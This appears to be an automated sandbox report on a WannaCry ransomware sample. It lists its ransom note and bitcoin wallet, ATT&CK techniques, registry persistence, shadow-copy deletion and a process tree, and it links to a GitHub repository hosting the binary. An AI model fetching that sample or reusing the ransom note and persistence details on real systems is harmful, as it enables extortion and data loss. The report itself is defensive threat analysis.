wannacry | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo/blob/master/Ransomware/WannaCry[.]exe

Analysis

max time kernel
171s
max time network
172s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
06-08-2024 11:09

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/Ransomware/WannaCry.exe

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\!Please Read Me!.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �

Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Drops startup file 2 IoCs

Processes:

WannaCry.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD9FC5.tmp	WannaCry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD9FDC.tmp	WannaCry.exe

Executes dropped EXE 6 IoCs

Processes:

WannaCry.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe

pid process

4140 WannaCry.exe
5628 !WannaDecryptor!.exe
5680 !WannaDecryptor!.exe
3580 !WannaDecryptor!.exe
5080 !WannaDecryptor!.exe
384 !WannaDecryptor!.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
4140	WannaCry.exe
5628	!WannaDecryptor!.exe
5680	!WannaDecryptor!.exe
3580	!WannaDecryptor!.exe
5080	!WannaDecryptor!.exe
384	!WannaDecryptor!.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

WannaCry.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\Downloads\\WannaCry.exe\" /r"	WannaCry.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

25 raw.githubusercontent.com
2 raw.githubusercontent.com

flow	ioc
25	raw.githubusercontent.com
2	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

!WannaDecryptor!.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp"	!WannaDecryptor!.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
defense_evasion

SIP and Trust Provider Hijacking
T1553.003

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier msedge.exe
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	msedge.exe

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exe!WannaDecryptor!.exeWannaCry.execscript.exetaskkill.exetaskkill.execmd.exe!WannaDecryptor!.exetaskkill.exetaskkill.exe!WannaDecryptor!.exe!WannaDecryptor!.execmd.exe!WannaDecryptor!.exeWMIC.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exefirefox.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

5324 taskkill.exe
1768 taskkill.exe
5620 taskkill.exe
5252 taskkill.exe

pid	process
5324	taskkill.exe
1768	taskkill.exe
5620	taskkill.exe
5252	taskkill.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "85"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe

Modifies registry class 3 IoCs

Processes:

msedge.exefirefox.exeMiniSearchHost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

NTFS ADS 2 IoCs

Processes:

msedge.exemsedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 854225.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exe

pid	process
2312	msedge.exe
2312	msedge.exe
5264	msedge.exe
5264	msedge.exe
2412	identity_helper.exe
2412	identity_helper.exe
3052	msedge.exe
3052	msedge.exe
4444	msedge.exe
4444	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

!WannaDecryptor!.exe

pid process

5080 !WannaDecryptor!.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

5264 msedge.exe
5264 msedge.exe
5264 msedge.exe
5264 msedge.exe
5264 msedge.exe
5264 msedge.exe
5264 msedge.exe

pid	process
5080	!WannaDecryptor!.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exefirefox.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	5620	taskkill.exe
Token: SeDebugPrivilege	5252	taskkill.exe
Token: SeDebugPrivilege	5324	taskkill.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	4308	firefox.exe
Token: SeDebugPrivilege	4308	firefox.exe
Token: SeIncreaseQuotaPrivilege	3696	WMIC.exe
Token: SeSecurityPrivilege	3696	WMIC.exe
Token: SeTakeOwnershipPrivilege	3696	WMIC.exe
Token: SeLoadDriverPrivilege	3696	WMIC.exe
Token: SeSystemProfilePrivilege	3696	WMIC.exe
Token: SeSystemtimePrivilege	3696	WMIC.exe
Token: SeProfSingleProcessPrivilege	3696	WMIC.exe
Token: SeIncBasePriorityPrivilege	3696	WMIC.exe
Token: SeCreatePagefilePrivilege	3696	WMIC.exe
Token: SeBackupPrivilege	3696	WMIC.exe
Token: SeRestorePrivilege	3696	WMIC.exe
Token: SeShutdownPrivilege	3696	WMIC.exe
Token: SeDebugPrivilege	3696	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3696	WMIC.exe
Token: SeRemoteShutdownPrivilege	3696	WMIC.exe
Token: SeUndockPrivilege	3696	WMIC.exe
Token: SeManageVolumePrivilege	3696	WMIC.exe
Token: 33	3696	WMIC.exe
Token: 34	3696	WMIC.exe
Token: 35	3696	WMIC.exe
Token: 36	3696	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3696	WMIC.exe
Token: SeSecurityPrivilege	3696	WMIC.exe
Token: SeTakeOwnershipPrivilege	3696	WMIC.exe
Token: SeLoadDriverPrivilege	3696	WMIC.exe
Token: SeSystemProfilePrivilege	3696	WMIC.exe
Token: SeSystemtimePrivilege	3696	WMIC.exe
Token: SeProfSingleProcessPrivilege	3696	WMIC.exe
Token: SeIncBasePriorityPrivilege	3696	WMIC.exe
Token: SeCreatePagefilePrivilege	3696	WMIC.exe
Token: SeBackupPrivilege	3696	WMIC.exe
Token: SeRestorePrivilege	3696	WMIC.exe
Token: SeShutdownPrivilege	3696	WMIC.exe
Token: SeDebugPrivilege	3696	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3696	WMIC.exe
Token: SeRemoteShutdownPrivilege	3696	WMIC.exe
Token: SeUndockPrivilege	3696	WMIC.exe
Token: SeManageVolumePrivilege	3696	WMIC.exe
Token: 33	3696	WMIC.exe
Token: 34	3696	WMIC.exe
Token: 35	3696	WMIC.exe
Token: 36	3696	WMIC.exe
Token: SeBackupPrivilege	4712	vssvc.exe
Token: SeRestorePrivilege	4712	vssvc.exe
Token: SeAuditPrivilege	4712	vssvc.exe

Suspicious use of FindShellTrayWindow 57 IoCs

Processes:

msedge.exefirefox.exe

pid	process
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe
5264	msedge.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exefirefox.exeMiniSearchHost.exe!WannaDecryptor!.exeLogonUI.exe

pid	process
5628	!WannaDecryptor!.exe
5628	!WannaDecryptor!.exe
5680	!WannaDecryptor!.exe
5680	!WannaDecryptor!.exe
3580	!WannaDecryptor!.exe
3580	!WannaDecryptor!.exe
5080	!WannaDecryptor!.exe
5080	!WannaDecryptor!.exe
4308	firefox.exe
2348	MiniSearchHost.exe
384	!WannaDecryptor!.exe
5484	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 5264 wrote to memory of 4476	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 4476	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 5224	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2312	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2312	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe
PID 5264 wrote to memory of 2420	5264	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/Ransomware/WannaCry.exe
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffacd803cb8,0x7ffacd803cc8,0x7ffacd803cd8
2⤵
PID:4476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
2⤵
PID:5224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
2⤵
PID:2420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
2⤵
PID:3476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
2⤵
PID:980

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
2⤵
PID:2644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5836 /prefetch:8
2⤵
PID:1368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
2⤵
PID:1540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
2⤵
PID:5084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
2⤵
PID:4580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
2⤵
PID:3492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1932,2675503827862000505,2982139029388763117,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6164 /prefetch:8
2⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4444

